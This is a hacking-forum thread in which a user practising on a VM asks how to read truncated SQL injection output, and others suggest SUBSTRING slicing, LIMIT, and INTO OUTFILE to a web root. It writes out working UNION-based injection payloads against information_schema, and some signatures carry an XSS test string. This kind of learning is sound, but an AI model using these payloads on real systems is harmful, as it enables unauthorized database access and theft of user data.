Donate to us!
The important thing is not to stop questioning. - Albert Einstein
Thursday, January 17, 2019
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 115
Guests Online: 114
Members Online: 1

Registered Members: 109452
Newest Member: VafinesAgops
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

SQL injection in limited space

Thorin
Member



Posts: 12
Location: India
Joined: 09.06.14
Rank:
Uber Elite
Posted on 12-01-17 06:18
This might seem like a noob question. I am currently trying SQL injection on a VM. This is what i am trying
Code
union select group_concat(table_name) from information_schema.tables#



And the injection works. But the page that is returned is an xml file and each tag has a size limitation, so I can see only half of the results.
Code

<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>




Is there a way to print the second half of the results. The table that i need to see contains the word "user". If I'm too ambiguous I want to do something along the lines of:
1. Arrange the rows of the result and then group_concat it
2. Slice the result (as in string[10:])
3. Select all the rows after tables_priv
_____________________________________________________________
What I already tried:
Code
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#



Nothing is printed out. But this query works when i directly try in the VM's mysql (after omitting the 'union' and the '#').
Code
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#



Didn't work on neither the web application nor directly in VM's mysql.

PS. I know sqlmap will do the job for me, but i want to try things manually.


&lt;script&gt;alert(1)&lt;/script&gt;
https://www.hellboundhackers.org/user/Thorin.html
Author

RE: SQL injection in limited space

skeet
Member



Posts: 11
Location:
Joined: 26.01.16
Rank:
HBH Guru
Posted on 12-01-17 15:27
If you know the current working directory or a directory you have access to try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'
Author

RE: SQL injection in limited space

Thorin
Member



Posts: 12
Location: India
Joined: 09.06.14
Rank:
Uber Elite
Posted on 12-01-17 21:40
I don't have access to the file system (from the hacker's perspective .. meaning no LFI vulnerabilities) ... Anyways i just solved the question. I used the following payload:

Code
union select substring(group_concat(table_name),341,341) from information_schema.tables#;





&lt;script&gt;alert(1)&lt;/script&gt;
https://www.hellboundhackers.org/user/Thorin.html
Author

RE: SQL injection in limited space

Thorin
Member



Posts: 12
Location: India
Joined: 09.06.14
Rank:
Uber Elite
Posted on 12-01-17 21:44
skeet wrote:
If you know the current working directory or a directory you have access to try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'


Taking into consideration what you're saying. Since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another sql injection, won't that lead me to the same place (size limitations). Won't work in this situation but certainly something to try on another machine Smile


&lt;script&gt;alert(1)&lt;/script&gt;
https://www.hellboundhackers.org/user/Thorin.html
Author

RE: SQL injection in limited space

skeet
Member



Posts: 11
Location:
Joined: 26.01.16
Rank:
HBH Guru
Posted on 12-01-17 21:48
Thorin wrote:
skeet wrote:
If you know the current working directory or a directory you have access to try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'


Taking into consideration what you're saying. Since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another sql injection, won't that lead me to the same place (size limitations). Won't work in this situation but certainly something to try on another machine Smile


I was thinking more along the lines of executing the query with INTO OUTFILE '/var/www/html/results.txt' then just checking with your browser at http://www.whatever.com/results.txt Either way glad you solved your problem Grin
Author

RE: SQL injection in limited space

Huitzilopochtli
Member



Posts: 1606
Location:
Joined: 19.02.13
Rank:
God
Posted on 15-01-17 03:39
If there was no INTO OUTFILE available I'd just have used LIMIT.